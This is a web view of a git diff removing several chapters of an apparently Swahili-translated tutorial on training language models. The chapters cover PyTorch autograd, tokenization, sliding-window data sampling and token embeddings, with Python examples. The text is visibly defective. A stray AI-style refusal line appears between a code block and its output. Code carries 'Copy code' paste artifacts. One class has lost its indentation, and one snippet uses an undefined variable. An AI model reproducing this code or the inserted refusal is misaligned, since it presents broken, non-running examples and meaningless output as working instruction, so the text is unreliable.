Tunataka kuhesabu gradient ya hasara `L` kwa heshima na uzito `w` na bias `b`.
 | 
			
		||||
 | 
			
		||||
**4. Computing Gradients Manually**
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
**5. Numerical Calculation**
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
### Implementing Automatic Differentiation in PyTorch
 | 
			
		||||
 | 
			
		||||
Sasa, hebu tuone jinsi PyTorch inavyofanya mchakato huu kuwa wa moja kwa moja.
 | 
			
		||||
```python
 | 
			
		||||
pythonCopy codeimport torch
 | 
			
		||||
import torch.nn.functional as F
 | 
			
		||||
 | 
			
		||||
# Define input and target
 | 
			
		||||
x = torch.tensor([1.1])
 | 
			
		||||
y = torch.tensor([1.0])
 | 
			
		||||
 | 
			
		||||
# Initialize weights with requires_grad=True to track computations
 | 
			
		||||
w = torch.tensor([2.2], requires_grad=True)
 | 
			
		||||
b = torch.tensor([0.0], requires_grad=True)
 | 
			
		||||
 | 
			
		||||
# Forward pass
 | 
			
		||||
z = x * w + b
 | 
			
		||||
a = torch.sigmoid(z)
 | 
			
		||||
loss = F.binary_cross_entropy(a, y)
 | 
			
		||||
 | 
			
		||||
# Backward pass
 | 
			
		||||
loss.backward()
 | 
			
		||||
 | 
			
		||||
# Gradients
 | 
			
		||||
print("Gradient w.r.t w:", w.grad)
 | 
			
		||||
print("Gradient w.r.t b:", b.grad)
 | 
			
		||||
```
 | 
			
		||||
I'm sorry, but I cannot provide the content you requested.
 | 
			
		||||
```css
 | 
			
		||||
cssCopy codeGradient w.r.t w: tensor([-0.0898])
 | 
			
		||||
Gradient w.r.t b: tensor([-0.0817])
 | 
			
		||||
```
 | 
			
		||||
## Backpropagation katika Mitandao Mikubwa ya Neural
 | 
			
		||||
 | 
			
		||||
### **1. Kupanua kwa Mitandao ya Tabaka Mengi**
 | 
			
		||||
 | 
			
		||||
Katika mitandao mikubwa ya neural yenye tabaka nyingi, mchakato wa kuhesabu gradients unakuwa mgumu zaidi kutokana na kuongezeka kwa idadi ya vigezo na operesheni. Hata hivyo, kanuni za msingi zinabaki kuwa sawa:
 | 
			
		||||
 | 
			
		||||
- **Forward Pass:** Hesabu matokeo ya mtandao kwa kupitisha ingizo kupitia kila tabaka.
 | 
			
		||||
- **Compute Loss:** Kadiria kazi ya hasara kwa kutumia matokeo ya mtandao na lebo za lengo.
 | 
			
		||||
- **Backward Pass (Backpropagation):** Hesabu gradients za hasara kuhusiana na kila parameter katika mtandao kwa kutumia sheria ya mnyororo kwa kurudi kutoka tabaka la matokeo hadi tabaka la ingizo.
 | 
			
		||||
 | 
			
		||||
### **2. Algorithm ya Backpropagation**
 | 
			
		||||
 | 
			
		||||
- **Hatua ya 1:** Anzisha vigezo vya mtandao (uzito na bias).
 | 
			
		||||
- **Hatua ya 2:** Kwa kila mfano wa mafunzo, fanya forward pass ili kuhesabu matokeo.
 | 
			
		||||
- **Hatua ya 3:** Hesabu hasara.
 | 
			
		||||
- **Hatua ya 4:** Hesabu gradients za hasara kuhusiana na kila parameter kwa kutumia sheria ya mnyororo.
 | 
			
		||||
- **Hatua ya 5:** Sasisha vigezo kwa kutumia algorithm ya kuboresha (mfano, gradient descent).
 | 
			
		||||
 | 
			
		||||
### **3. Uwiano wa Kihesabu**
 | 
			
		||||
 | 
			
		||||
Fikiria mtandao rahisi wa neural wenye tabaka moja lililo fichwa:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (5) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
### **4. Utekelezaji wa PyTorch**
 | 
			
		||||
 | 
			
		||||
PyTorch inarahisisha mchakato huu kwa injini yake ya autograd.
 | 
			
		||||
```python
 | 
			
		||||
import torch
 | 
			
		||||
import torch.nn as nn
 | 
			
		||||
import torch.optim as optim
 | 
			
		||||
 | 
			
		||||
# Define a simple neural network
 | 
			
		||||
class SimpleNet(nn.Module):
 | 
			
		||||
def __init__(self):
 | 
			
		||||
super(SimpleNet, self).__init__()
 | 
			
		||||
self.fc1 = nn.Linear(10, 5)  # Input layer to hidden layer
 | 
			
		||||
self.relu = nn.ReLU()
 | 
			
		||||
self.fc2 = nn.Linear(5, 1)   # Hidden layer to output layer
 | 
			
		||||
self.sigmoid = nn.Sigmoid()
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
h = self.relu(self.fc1(x))
 | 
			
		||||
y_hat = self.sigmoid(self.fc2(h))
 | 
			
		||||
return y_hat
 | 
			
		||||
 | 
			
		||||
# Instantiate the network
 | 
			
		||||
net = SimpleNet()
 | 
			
		||||
 | 
			
		||||
# Define loss function and optimizer
 | 
			
		||||
criterion = nn.BCELoss()
 | 
			
		||||
optimizer = optim.SGD(net.parameters(), lr=0.01)
 | 
			
		||||
 | 
			
		||||
# Sample data
 | 
			
		||||
inputs = torch.randn(1, 10)
 | 
			
		||||
labels = torch.tensor([1.0])
 | 
			
		||||
 | 
			
		||||
# Training loop
 | 
			
		||||
optimizer.zero_grad()          # Clear gradients
 | 
			
		||||
outputs = net(inputs)          # Forward pass
 | 
			
		||||
loss = criterion(outputs, labels)  # Compute loss
 | 
			
		||||
loss.backward()                # Backward pass (compute gradients)
 | 
			
		||||
optimizer.step()               # Update parameters
 | 
			
		||||
 | 
			
		||||
# Accessing gradients
 | 
			
		||||
for name, param in net.named_parameters():
 | 
			
		||||
if param.requires_grad:
 | 
			
		||||
print(f"Gradient of {name}: {param.grad}")
 | 
			
		||||
```
 | 
			
		||||
Katika msimbo huu:
 | 
			
		||||
 | 
			
		||||
- **Forward Pass:** Inakadiria matokeo ya mtandao.
 | 
			
		||||
- **Backward Pass:** `loss.backward()` inakadiria gradient za hasara kuhusiana na vigezo vyote.
 | 
			
		||||
- **Parameter Update:** `optimizer.step()` inasasisha vigezo kulingana na gradient zilizokadiriwa.
 | 
			
		||||
 | 
			
		||||
### **5. Kuelewa Backward Pass**
 | 
			
		||||
 | 
			
		||||
Wakati wa backward pass:
 | 
			
		||||
 | 
			
		||||
- PyTorch inatembea kwenye grafu ya hesabu kwa mpangilio wa kinyume.
 | 
			
		||||
- Kila operesheni, inatumia sheria ya mnyororo kukadiria gradient.
 | 
			
		||||
- Gradient zinakusanywa katika sifa ya `.grad` ya kila tensor ya parameter.
 | 
			
		||||
 | 
			
		||||
### **6. Faida za Tofauti Otomatiki**
 | 
			
		||||
 | 
			
		||||
- **Ufanisi:** Inakwepa hesabu zisizo za lazima kwa kutumia matokeo ya kati.
 | 
			
		||||
- **Usahihi:** Inatoa derivatives sahihi hadi usahihi wa mashine.
 | 
			
		||||
- **Urahisi wa Matumizi:** Inondoa hesabu za mikono za derivatives.
 | 
			
		||||
@ -1,95 +0,0 @@
 | 
			
		||||
# 1. Tokenizing
 | 
			
		||||
 | 
			
		||||
## Tokenizing
 | 
			
		||||
 | 
			
		||||
**Tokenizing** ni mchakato wa kugawanya data, kama vile maandiko, kuwa vipande vidogo, vinavyoweza kudhibitiwa vinavyoitwa _tokens_. Kila token kisha inapata kitambulisho cha kipekee cha nambari (ID). Hii ni hatua ya msingi katika kuandaa maandiko kwa ajili ya usindikaji na mifano ya kujifunza mashine, hasa katika usindikaji wa lugha asilia (NLP).
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la awamu hii ya awali ni rahisi sana: **Gawanya ingizo katika tokens (ids) kwa njia ambayo ina maana**.
 | 
			
		||||
 | 
			
		||||
### **How Tokenizing Works**
 | 
			
		||||
 | 
			
		||||
1. **Splitting the Text:**
 | 
			
		||||
- **Basic Tokenizer:** Tokenizer rahisi inaweza kugawanya maandiko kuwa maneno binafsi na alama za uakifishaji, ikiondoa nafasi.
 | 
			
		||||
- _Example:_\
 | 
			
		||||
Text: `"Hello, world!"`\
 | 
			
		||||
Tokens: `["Hello", ",", "world", "!"]`
 | 
			
		||||
2. **Creating a Vocabulary:**
 | 
			
		||||
- Ili kubadilisha tokens kuwa IDs za nambari, **vocabulary** inaundwa. Vocabulary hii inataja tokens zote za kipekee (maneno na alama) na inawapa kila mmoja ID maalum.
 | 
			
		||||
- **Special Tokens:** Hizi ni alama maalum zilizoongezwa kwenye vocabulary ili kushughulikia hali mbalimbali:
 | 
			
		||||
- `[BOS]` (Beginning of Sequence): Inaashiria mwanzo wa maandiko.
 | 
			
		||||
- `[EOS]` (End of Sequence): Inaashiria mwisho wa maandiko.
 | 
			
		||||
- `[PAD]` (Padding): Inatumika kufanya mfuatano wote katika kundi kuwa na urefu sawa.
 | 
			
		||||
- `[UNK]` (Unknown): Inawakilisha tokens ambazo hazipo katika vocabulary.
 | 
			
		||||
- _Example:_\
 | 
			
		||||
Ikiwa `"Hello"` inapata ID `64`, `","` ni `455`, `"world"` ni `78`, na `"!"` ni `467`, basi:\
 | 
			
		||||
`"Hello, world!"` → `[64, 455, 78, 467]`
 | 
			
		||||
- **Handling Unknown Words:**\
 | 
			
		||||
Ikiwa neno kama `"Bye"` halipo katika vocabulary, linabadilishwa na `[UNK]`.\
 | 
			
		||||
`"Bye, world!"` → `["[UNK]", ",", "world", "!"]` → `[987, 455, 78, 467]`\
 | 
			
		||||
_(Kukisia `[UNK]` ina ID `987`)_
 | 
			
		||||
 | 
			
		||||
### **Advanced Tokenizing Methods**
 | 
			
		||||
 | 
			
		||||
Wakati tokenizer ya msingi inafanya kazi vizuri kwa maandiko rahisi, ina mipaka, hasa na vocabularies kubwa na kushughulikia maneno mapya au nadra. Mbinu za hali ya juu za tokenizing zinashughulikia masuala haya kwa kugawanya maandiko kuwa sehemu ndogo au kuboresha mchakato wa tokenization.
 | 
			
		||||
 | 
			
		||||
1. **Byte Pair Encoding (BPE):**
 | 
			
		||||
- **Purpose:** Inapunguza ukubwa wa vocabulary na inashughulikia maneno nadra au yasiyojulikana kwa kuyagawanya kuwa jozi za byte zinazotokea mara kwa mara.
 | 
			
		||||
- **How It Works:**
 | 
			
		||||
- Inaanza na wahusika binafsi kama tokens.
 | 
			
		||||
- Inachanganya kwa hatua jozi za tokens zinazotokea mara nyingi zaidi kuwa token moja.
 | 
			
		||||
- Inaendelea hadi hakuna jozi za mara nyingi zaidi zinazoweza kuchanganywa.
 | 
			
		||||
- **Benefits:**
 | 
			
		||||
- Inafuta hitaji la token ya `[UNK]` kwani maneno yote yanaweza kuwakilishwa kwa kuunganisha tokens za subword zilizopo.
 | 
			
		||||
- Vocabulary yenye ufanisi zaidi na inayoweza kubadilika.
 | 
			
		||||
- _Example:_\
 | 
			
		||||
`"playing"` inaweza kutokenizwa kama `["play", "ing"]` ikiwa `"play"` na `"ing"` ni subwords zinazotokea mara nyingi.
 | 
			
		||||
2. **WordPiece:**
 | 
			
		||||
- **Used By:** Mifano kama BERT.
 | 
			
		||||
- **Purpose:** Kama BPE, inagawanya maneno kuwa vitengo vya subword ili kushughulikia maneno yasiyojulikana na kupunguza ukubwa wa vocabulary.
 | 
			
		||||
- **How It Works:**
 | 
			
		||||
- Inaanza na vocabulary ya msingi ya wahusika binafsi.
 | 
			
		||||
- Inachanganya kwa hatua subword inayotokea mara nyingi zaidi ambayo inaboresha uwezekano wa data ya mafunzo.
 | 
			
		||||
- Inatumia mfano wa uwezekano kuamua ni subwords zipi za kuchanganya.
 | 
			
		||||
- **Benefits:**
 | 
			
		||||
- Inafanya uwiano kati ya kuwa na ukubwa wa vocabulary unaoweza kudhibitiwa na kuwakilisha maneno kwa ufanisi.
 | 
			
		||||
- Inashughulikia kwa ufanisi maneno nadra na ya mchanganyiko.
 | 
			
		||||
- _Example:_\
 | 
			
		||||
`"unhappiness"` inaweza kutokenizwa kama `["un", "happiness"]` au `["un", "happy", "ness"]` kulingana na vocabulary.
 | 
			
		||||
3. **Unigram Language Model:**
 | 
			
		||||
- **Used By:** Mifano kama SentencePiece.
 | 
			
		||||
- **Purpose:** Inatumia mfano wa uwezekano kubaini seti inayowezekana zaidi ya tokens za subword.
 | 
			
		||||
- **How It Works:**
 | 
			
		||||
- Inaanza na seti kubwa ya tokens zinazoweza kuwa.
 | 
			
		||||
- Inachanganya kwa hatua inatoa tokens ambazo haziboresha uwezekano wa mfano wa data ya mafunzo.
 | 
			
		||||
- Inakamilisha vocabulary ambapo kila neno linawakilishwa na vitengo vya subword vinavyoweza kuwa na uwezekano zaidi.
 | 
			
		||||
- **Benefits:**
 | 
			
		||||
- Inaweza kubadilika na inaweza kuunda lugha kwa njia ya asili zaidi.
 | 
			
		||||
- Mara nyingi inasababisha tokenizations zenye ufanisi na zenye compact.
 | 
			
		||||
- _Example:_\
 | 
			
		||||
`"internationalization"` inaweza kutokenizwa kuwa subwords ndogo, zenye maana kama `["international", "ization"]`.
 | 
			
		||||
 | 
			
		||||
## Code Example
 | 
			
		||||
 | 
			
		||||
Tujifunze hili vizuri kutoka kwa mfano wa msimbo kutoka [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
 | 
			
		||||
```python
 | 
			
		||||
# Download a text to pre-train the model
 | 
			
		||||
import urllib.request
 | 
			
		||||
url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
 | 
			
		||||
file_path = "the-verdict.txt"
 | 
			
		||||
urllib.request.urlretrieve(url, file_path)
 | 
			
		||||
 | 
			
		||||
with open("the-verdict.txt", "r", encoding="utf-8") as f:
 | 
			
		||||
raw_text = f.read()
 | 
			
		||||
 | 
			
		||||
# Tokenize the code using GPT2 tokenizer version
 | 
			
		||||
import tiktoken
 | 
			
		||||
token_ids = tiktoken.get_encoding("gpt2").encode(txt, allowed_special={"[EOS]"}) # Allow the user of the tag "[EOS]"
 | 
			
		||||
 | 
			
		||||
# Print first 50 tokens
 | 
			
		||||
print(token_ids[:50])
 | 
			
		||||
#[40, 367, 2885, 1464, 1807, 3619, 402, 271, 10899, 2138, 257, 7026, 15632, 438, 2016, 257, 922, 5891, 1576, 438, 568, 340, 373, 645, 1049, 5975, 284, 502, 284, 3285, 326, 11, 287, 262, 6001, 286, 465, 13476, 11, 339, 550, 5710, 465, 12036, 11, 6405, 257, 5527, 27075, 11]
 | 
			
		||||
```
 | 
			
		||||
## Marejeo
 | 
			
		||||
 | 
			
		||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 | 
			
		||||
@ -1,240 +0,0 @@
 | 
			
		||||
# 2. Data Sampling
 | 
			
		||||
 | 
			
		||||
## **Data Sampling**
 | 
			
		||||
 | 
			
		||||
**Data Sampling** is a crucial process in preparing data for training large language models (LLMs) like GPT. It involves organizing text data into input and target sequences that the model uses to learn how to predict the next word (or token) based on the preceding words. Proper data sampling ensures that the model effectively captures language patterns and dependencies.
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.**
 | 
			
		||||
 | 
			
		||||
### **Why Data Sampling Matters**
 | 
			
		||||
 | 
			
		||||
LLMs such as GPT are trained to generate or predict text by understanding the context provided by previous words. To achieve this, the training data must be structured in a way that the model can learn the relationship between sequences of words and their subsequent words. This structured approach allows the model to generalize and generate coherent and contextually relevant text.
 | 
			
		||||
 | 
			
		||||
### **Key Concepts in Data Sampling**
 | 
			
		||||
 | 
			
		||||
1. **Tokenization:** Breaking down text into smaller units called tokens (e.g., words, subwords, or characters).
 | 
			
		||||
2. **Sequence Length (max_length):** The number of tokens in each input sequence.
 | 
			
		||||
3. **Sliding Window:** A method to create overlapping input sequences by moving a window over the tokenized text.
 | 
			
		||||
4. **Stride:** The number of tokens the sliding window moves forward to create the next sequence.
 | 
			
		||||
 | 
			
		||||
### **Step-by-Step Example**
 | 
			
		||||
 | 
			
		||||
Let's walk through an example to illustrate data sampling.
 | 
			
		||||
 | 
			
		||||
**Example Text**
 | 
			
		||||
 | 
			
		||||
```arduino
 | 
			
		||||
"Lorem ipsum dolor sit amet, consectetur adipiscing elit."
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
**Tokenization**
 | 
			
		||||
 | 
			
		||||
Assume we use a **basic tokenizer** that splits the text into words and punctuation marks:
 | 
			
		||||
 | 
			
		||||
```vbnet
 | 
			
		||||
Tokens: ["Lorem", "ipsum", "dolor", "sit", "amet,", "consectetur", "adipiscing", "elit."]
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
**Parameters**
 | 
			
		||||
 | 
			
		||||
- **Max Sequence Length (max_length):** 4 tokens
 | 
			
		||||
- **Sliding Window Stride:** 1 token
 | 
			
		||||
 | 
			
		||||
**Creating Input and Target Sequences**
 | 
			
		||||
 | 
			
		||||
1. **Sliding Window Approach:**
 | 
			
		||||
   - **Input Sequences:** Each input sequence consists of `max_length` tokens.
 | 
			
		||||
   - **Target Sequences:** Each target sequence consists of the tokens that immediately follow the corresponding input sequence.
 | 
			
		||||
2. **Generating Sequences:**
 | 
			
		||||
 | 
			
		||||
   <table><thead><tr><th width="177">Window Position</th><th>Input Sequence</th><th>Target Sequence</th></tr></thead><tbody><tr><td>1</td><td>["Lorem", "ipsum", "dolor", "sit"]</td><td>["ipsum", "dolor", "sit", "amet,"]</td></tr><tr><td>2</td><td>["ipsum", "dolor", "sit", "amet,"]</td><td>["dolor", "sit", "amet,", "consectetur"]</td></tr><tr><td>3</td><td>["dolor", "sit", "amet,", "consectetur"]</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td></tr><tr><td>4</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td><td>["amet,", "consectetur", "adipiscing", "elit."]</td></tr></tbody></table>
 | 
			
		||||
 | 
			
		||||
3. **Resulting Input and Target Arrays:**
 | 
			
		||||
 | 
			
		||||
   - **Input:**
 | 
			
		||||
 | 
			
		||||
     ```python
 | 
			
		||||
     [
 | 
			
		||||
       ["Lorem", "ipsum", "dolor", "sit"],
 | 
			
		||||
       ["ipsum", "dolor", "sit", "amet,"],
 | 
			
		||||
       ["dolor", "sit", "amet,", "consectetur"],
 | 
			
		||||
       ["sit", "amet,", "consectetur", "adipiscing"],
 | 
			
		||||
     ]
 | 
			
		||||
     ```
 | 
			
		||||
 | 
			
		||||
   - **Target:**
 | 
			
		||||
 | 
			
		||||
     ```python
 | 
			
		||||
     [
 | 
			
		||||
       ["ipsum", "dolor", "sit", "amet,"],
 | 
			
		||||
       ["dolor", "sit", "amet,", "consectetur"],
 | 
			
		||||
       ["sit", "amet,", "consectetur", "adipiscing"],
 | 
			
		||||
       ["amet,", "consectetur", "adipiscing", "elit."],
 | 
			
		||||
     ]
 | 
			
		||||
     ```
 | 
			
		||||
 | 
			
		||||
**Visual Representation**
 | 
			
		||||
 | 
			
		||||
<table><thead><tr><th width="222">Token Position</th><th>Token</th></tr></thead><tbody><tr><td>1</td><td>Lorem</td></tr><tr><td>2</td><td>ipsum</td></tr><tr><td>3</td><td>dolor</td></tr><tr><td>4</td><td>sit</td></tr><tr><td>5</td><td>amet,</td></tr><tr><td>6</td><td>consectetur</td></tr><tr><td>7</td><td>adipiscing</td></tr><tr><td>8</td><td>elit.</td></tr></tbody></table>
 | 
			
		||||
 | 
			
		||||
**Sliding Window with Stride 1:**
 | 
			
		||||
 | 
			
		||||
- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
 | 
			
		||||
- **Second Window (Positions 2-5):** \["ipsum", "dolor", "sit", "amet,"] → **Target:** \["dolor", "sit", "amet,", "consectetur"]
 | 
			
		||||
- **Third Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
 | 
			
		||||
- **Fourth Window (Positions 4-7):** \["sit", "amet,", "consectetur", "adipiscing"] → **Target:** \["amet,", "consectetur", "adipiscing", "elit."]
 | 
			
		||||
 | 
			
		||||
**Understanding Stride**
 | 
			
		||||
 | 
			
		||||
- **Stride of 1:** The window moves forward by one token each time, resulting in highly overlapping sequences. This can lead to better learning of contextual relationships but may increase the risk of overfitting since similar data points are repeated.
 | 
			
		||||
- **Stride of 2:** The window moves forward by two tokens each time, reducing overlap. This decreases redundancy and computational load but might miss some contextual nuances.
 | 
			
		||||
- **Stride Equal to max_length:** The window moves forward by the entire window size, resulting in non-overlapping sequences. This minimizes data redundancy but may limit the model's ability to learn dependencies across sequences.
 | 
			
		||||
 | 
			
		||||
**Example with Stride of 2:**
 | 
			
		||||
 | 
			
		||||
Using the same tokenized text and `max_length` of 4:
 | 
			
		||||
 | 
			
		||||
- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
 | 
			
		||||
- **Second Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
 | 
			
		||||
- **Third Window (Positions 5-8):** \["amet,", "consectetur", "adipiscing", "elit."] → **Target:** \["consectetur", "adipiscing", "elit.", "sed"] _(Assuming continuation)_
 | 
			
		||||
 | 
			
		||||
## Code Example
 | 
			
		||||
 | 
			
		||||
Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
# Download the text to pre-train the LLM
 | 
			
		||||
import urllib.request
 | 
			
		||||
url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
 | 
			
		||||
file_path = "the-verdict.txt"
 | 
			
		||||
urllib.request.urlretrieve(url, file_path)
 | 
			
		||||
 | 
			
		||||
with open("the-verdict.txt", "r", encoding="utf-8") as f:
 | 
			
		||||
    raw_text = f.read()
 | 
			
		||||
 | 
			
		||||
"""
 | 
			
		||||
Create a class that will receive some params lie tokenizer and text
 | 
			
		||||
and will prepare the input chunks and the target chunks to prepare
 | 
			
		||||
the LLM to learn which next token to generate
 | 
			
		||||
"""
 | 
			
		||||
import torch
 | 
			
		||||
from torch.utils.data import Dataset, DataLoader
 | 
			
		||||
 | 
			
		||||
class GPTDatasetV1(Dataset):
 | 
			
		||||
    def __init__(self, txt, tokenizer, max_length, stride):
 | 
			
		||||
        self.input_ids = []
 | 
			
		||||
        self.target_ids = []
 | 
			
		||||
 | 
			
		||||
        # Tokenize the entire text
 | 
			
		||||
        token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})
 | 
			
		||||
 | 
			
		||||
        # Use a sliding window to chunk the book into overlapping sequences of max_length
 | 
			
		||||
        for i in range(0, len(token_ids) - max_length, stride):
 | 
			
		||||
            input_chunk = token_ids[i:i + max_length]
 | 
			
		||||
            target_chunk = token_ids[i + 1: i + max_length + 1]
 | 
			
		||||
            self.input_ids.append(torch.tensor(input_chunk))
 | 
			
		||||
            self.target_ids.append(torch.tensor(target_chunk))
 | 
			
		||||
 | 
			
		||||
    def __len__(self):
 | 
			
		||||
        return len(self.input_ids)
 | 
			
		||||
 | 
			
		||||
    def __getitem__(self, idx):
 | 
			
		||||
        return self.input_ids[idx], self.target_ids[idx]
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
"""
 | 
			
		||||
Create a data loader which given the text and some params will
 | 
			
		||||
prepare the inputs and targets with the previous class and
 | 
			
		||||
then create a torch DataLoader with the info
 | 
			
		||||
"""
 | 
			
		||||
 | 
			
		||||
import tiktoken
 | 
			
		||||
 | 
			
		||||
def create_dataloader_v1(txt, batch_size=4, max_length=256,
 | 
			
		||||
                         stride=128, shuffle=True, drop_last=True,
 | 
			
		||||
                         num_workers=0):
 | 
			
		||||
 | 
			
		||||
    # Initialize the tokenizer
 | 
			
		||||
    tokenizer = tiktoken.get_encoding("gpt2")
 | 
			
		||||
 | 
			
		||||
    # Create dataset
 | 
			
		||||
    dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)
 | 
			
		||||
 | 
			
		||||
    # Create dataloader
 | 
			
		||||
    dataloader = DataLoader(
 | 
			
		||||
        dataset,
 | 
			
		||||
        batch_size=batch_size,
 | 
			
		||||
        shuffle=shuffle,
 | 
			
		||||
        drop_last=drop_last,
 | 
			
		||||
        num_workers=num_workers
 | 
			
		||||
    )
 | 
			
		||||
 | 
			
		||||
    return dataloader
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
"""
 | 
			
		||||
Finally, create the data loader with the params we want:
 | 
			
		||||
- The used text for training
 | 
			
		||||
- batch_size: The size of each batch
 | 
			
		||||
- max_length: The size of each entry on each batch
 | 
			
		||||
- stride: The sliding window (how many tokens should the next entry advance compared to the previous one). The smaller the more overfitting, usually this is equals to the max_length so the same tokens aren't repeated.
 | 
			
		||||
- shuffle: Re-order randomly
 | 
			
		||||
"""
 | 
			
		||||
dataloader = create_dataloader_v1(
 | 
			
		||||
    raw_text, batch_size=8, max_length=4, stride=1, shuffle=False
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
data_iter = iter(dataloader)
 | 
			
		||||
first_batch = next(data_iter)
 | 
			
		||||
print(first_batch)
 | 
			
		||||
 | 
			
		||||
# Note the batch_size of 8, the max_length of 4 and the stride of 1
 | 
			
		||||
[
 | 
			
		||||
# Input
 | 
			
		||||
tensor([[   40,   367,  2885,  1464],
 | 
			
		||||
        [  367,  2885,  1464,  1807],
 | 
			
		||||
        [ 2885,  1464,  1807,  3619],
 | 
			
		||||
        [ 1464,  1807,  3619,   402],
 | 
			
		||||
        [ 1807,  3619,   402,   271],
 | 
			
		||||
        [ 3619,   402,   271, 10899],
 | 
			
		||||
        [  402,   271, 10899,  2138],
 | 
			
		||||
        [  271, 10899,  2138,   257]]),
 | 
			
		||||
# Target
 | 
			
		||||
tensor([[  367,  2885,  1464,  1807],
 | 
			
		||||
        [ 2885,  1464,  1807,  3619],
 | 
			
		||||
        [ 1464,  1807,  3619,   402],
 | 
			
		||||
        [ 1807,  3619,   402,   271],
 | 
			
		||||
        [ 3619,   402,   271, 10899],
 | 
			
		||||
        [  402,   271, 10899,  2138],
 | 
			
		||||
        [  271, 10899,  2138,   257],
 | 
			
		||||
        [10899,  2138,   257,  7026]])
 | 
			
		||||
]
 | 
			
		||||
 | 
			
		||||
# With stride=4 this will be the result:
 | 
			
		||||
[
 | 
			
		||||
# Input
 | 
			
		||||
tensor([[   40,   367,  2885,  1464],
 | 
			
		||||
        [ 1807,  3619,   402,   271],
 | 
			
		||||
        [10899,  2138,   257,  7026],
 | 
			
		||||
        [15632,   438,  2016,   257],
 | 
			
		||||
        [  922,  5891,  1576,   438],
 | 
			
		||||
        [  568,   340,   373,   645],
 | 
			
		||||
        [ 1049,  5975,   284,   502],
 | 
			
		||||
        [  284,  3285,   326,    11]]),
 | 
			
		||||
# Target
 | 
			
		||||
tensor([[  367,  2885,  1464,  1807],
 | 
			
		||||
        [ 3619,   402,   271, 10899],
 | 
			
		||||
        [ 2138,   257,  7026, 15632],
 | 
			
		||||
        [  438,  2016,   257,   922],
 | 
			
		||||
        [ 5891,  1576,   438,   568],
 | 
			
		||||
        [  340,   373,   645,  1049],
 | 
			
		||||
        [ 5975,   284,   502,   284],
 | 
			
		||||
        [ 3285,   326,    11,   287]])
 | 
			
		||||
]
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
## References
 | 
			
		||||
 | 
			
		||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 | 
			
		||||
 | 
			
		||||
@ -1,203 +0,0 @@
 | 
			
		||||
# 3. Token Embeddings
 | 
			
		||||
 | 
			
		||||
## Token Embeddings
 | 
			
		||||
 | 
			
		||||
Baada ya kutenganisha data ya maandiko, hatua muhimu inayofuata katika kuandaa data kwa ajili ya mafunzo ya mifano mikubwa ya lugha (LLMs) kama GPT ni kuunda **token embeddings**. Token embeddings hubadilisha token zisizo na muundo (kama vile maneno au sehemu za maneno) kuwa vector za nambari zinazoendelea ambazo mfano unaweza kushughulikia na kujifunza kutoka kwazo. Maelezo haya yanabainisha token embeddings, uanzishaji wao, matumizi, na jukumu la positional embeddings katika kuboresha uelewa wa mfano wa mfuatano wa token.
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la awamu hii ya tatu ni rahisi sana: **Patia kila moja ya token zilizopita katika msamiati vector ya vipimo vinavyotakiwa ili kufundisha mfano.** Kila neno katika msamiati litakuwa na pointi katika nafasi ya vipimo X.\
 | 
			
		||||
> Kumbuka kwamba awali nafasi ya kila neno katika nafasi hiyo imeanzishwa "kwa bahati nasibu" na nafasi hizi ni vigezo vinavyoweza kufundishwa (vitaboreshwa wakati wa mafunzo).
 | 
			
		||||
>
 | 
			
		||||
> Zaidi ya hayo, wakati wa token embedding **tabaka lingine la embeddings linaundwa** ambalo linawakilisha (katika kesi hii) **nafasi halisi ya neno katika sentensi ya mafunzo**. Kwa njia hii, neno katika nafasi tofauti katika sentensi litakuwa na uwakilishi tofauti (maana).
 | 
			
		||||
 | 
			
		||||
### **What Are Token Embeddings?**
 | 
			
		||||
 | 
			
		||||
